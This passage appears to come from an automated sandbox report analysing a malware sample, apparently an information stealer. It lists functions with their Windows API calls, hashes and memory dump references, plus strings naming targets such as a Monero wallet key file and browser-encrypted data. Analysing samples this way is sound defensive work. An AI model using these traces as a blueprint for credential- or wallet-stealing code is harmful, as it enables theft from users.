                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: b10f5033edf00ce9bdeb8c7334a1f1b96cb478a0395bde721dd2ed50f8f3c022
                                      • Instruction ID: de093eae0a214000f64f6bfdb4de75c5a00f3fd0e791819dea0dd7dff31a15a6
                                      • Opcode Fuzzy Hash: b10f5033edf00ce9bdeb8c7334a1f1b96cb478a0395bde721dd2ed50f8f3c022
                                      • Instruction Fuzzy Hash: 1501CD79A40309BBEB18DFD4D849FAE77B9AB48701F1041A9FA159B2C4D6709A409B90
                                      Function 00F268D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00F26903
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F269C6
                                      • ExitProcess.KERNEL32 ref: 00F269F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 5c8a7be7633ea96969c519ab0dba5c11bcc28d484c4c4751efcdec1d4b282d06
                                      • Instruction ID: 8c23af70247207dc17a1e14ad79f0ee7a2f67b97b6b1a9b92ccfd2d4863c2965
                                      • Opcode Fuzzy Hash: 5c8a7be7633ea96969c519ab0dba5c11bcc28d484c4c4751efcdec1d4b282d06
                                      • Instruction Fuzzy Hash: 273130B1901228ABDB18EB90ED92FDDB778AF54300F804199F21577185DF786B88CF55
                                      Function 00F28950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F30E10,00000000,?), ref: 00F289BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F289C6
                                      • wsprintfA.USER32 ref: 00F289E0
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: ebeddc5d190792e1eeff587a00b4edca66b269677133808aca332e8fc5949635
                                      • Instruction ID: ed894094adc406530f9fac54ed3a3cecc095b5629ad53298242fa66057753e7b
                                      • Opcode Fuzzy Hash: ebeddc5d190792e1eeff587a00b4edca66b269677133808aca332e8fc5949635
                                      • Instruction Fuzzy Hash: 7A2160B1A40205AFEB14DFD4DD45FAEBBB8FB48711F104119F615AB2C4C7759940CBA1
                                      Function 00F1A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F1A098
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 1029625771-1545816527
                                      • Opcode ID: 5f3e057b69b5e3d27f0cb696a0127127c9817df529211348e8eb0d3f42e93fbc
                                      • Instruction ID: a14bc3e9d1477e8b35aeeeb961a5a7a64ff18ae8fa293bf621c5d6929ce0c2ed
                                      • Opcode Fuzzy Hash: 5f3e057b69b5e3d27f0cb696a0127127c9817df529211348e8eb0d3f42e93fbc
                                      • Instruction Fuzzy Hash: 3CF01D79655304AFE729ABE0EA48BA63BD4B306360F001634F5369B1C4C2B598C4DBE2
                                      Function 00F28EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F296AE,00000000), ref: 00F28EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F28EF2
                                      • wsprintfW.USER32 ref: 00F28F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: dc9ceb1a76be6e5764b705318cd02e6ceb38b51caa7dfb1b92b1dd42bf43ed81
                                      • Instruction ID: 4fb74ec641943ef48fd7ccf32e2c3f3b2ca1c1d30cfc4ed84712141aecb25bdf
                                      • Opcode Fuzzy Hash: dc9ceb1a76be6e5764b705318cd02e6ceb38b51caa7dfb1b92b1dd42bf43ed81
                                      • Instruction Fuzzy Hash: 96E0EC75A44309BBEB28DBD4DD0AE6D77B8EB05702F0001A5FE099B380DA719E509BD2
                                      Function 00F1A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1AA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00F1AB2F
                                      • lstrlen.KERNEL32(00000000), ref: 00F1ADEC
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F1AE73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 3d8e621507203fd399b1dffe5348902fd6f6abd48982cafab27ad44662e1219f
                                      • Instruction ID: 0bd89b0a02b8d6e610b81244004bfc7d4c8431fa4f0ff35d492591001f0c6f33
                                      • Opcode Fuzzy Hash: 3d8e621507203fd399b1dffe5348902fd6f6abd48982cafab27ad44662e1219f
                                      • Instruction Fuzzy Hash: 5CE103729101289BCB19FBE4EDA2EEE7339BF54300F408559F51676091EF386A4CDB62
                                      Function 00F1D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1D581
                                      • lstrlen.KERNEL32(00000000), ref: 00F1D798
                                      • lstrlen.KERNEL32(00000000), ref: 00F1D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F1D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: a11dd2a431a74107e5e50494931e877d30f47171afc05a855675a6dce9ab317c
                                      • Instruction ID: 10a3b4ddbe02bffb4867d3a74853a5f590021c987873aadb780110440fbd72e2
                                      • Opcode Fuzzy Hash: a11dd2a431a74107e5e50494931e877d30f47171afc05a855675a6dce9ab317c
                                      • Instruction Fuzzy Hash: 4B913072D101289BCB19FBE0EDA2EEE7339BF54304F404568F51676091EF386A48DB62
                                      Function 00F1D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1D901
                                      • lstrlen.KERNEL32(00000000), ref: 00F1DA9F
                                      • lstrlen.KERNEL32(00000000), ref: 00F1DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F1DB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 51314a34bafad851516dd583089746439468d63d1f8e85b50ba0cda605e5470c
                                      • Instruction ID: 7bf6d97b4d05838f7161e1fb4ca954c038ecbd7e45e131f3e03b4d28b97826e3
                                      • Opcode Fuzzy Hash: 51314a34bafad851516dd583089746439468d63d1f8e85b50ba0cda605e5470c
                                      • Instruction Fuzzy Hash: 4E812572D101289BCB19FBE4ECA2EEE7379BF54304F404568F51676091EF386A48DB62
                                      Function 00F8FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: 82156ee119ebf291c89af513c54a2e2b60a9fc4ef0bfd6460dddd35b19a42307
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: 1B51C372900206AFEF29AF54C841BFA77A4FF41320F24422DEA15875A1EB35ED44FB90
                                      Function 00F1A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00F1A664
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 6dd63a60a4cd05f3602e9a14b5deff8afedb6d6aab1e89ed9c990140a418773d
                                      • Instruction ID: 27fe9cdb238fd1aa7506f2b12d37b91f0fc13e43897357836eddd0b212b515a9
                                      • Opcode Fuzzy Hash: 6dd63a60a4cd05f3602e9a14b5deff8afedb6d6aab1e89ed9c990140a418773d
                                      • Instruction Fuzzy Hash: E9514C70A10208EFDB14EFA4DD96FED7776BF44304F008018F90A6B291EB74AA45EB52
                                      Function 00F1F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                      Download Yara Rule
                                      APIs
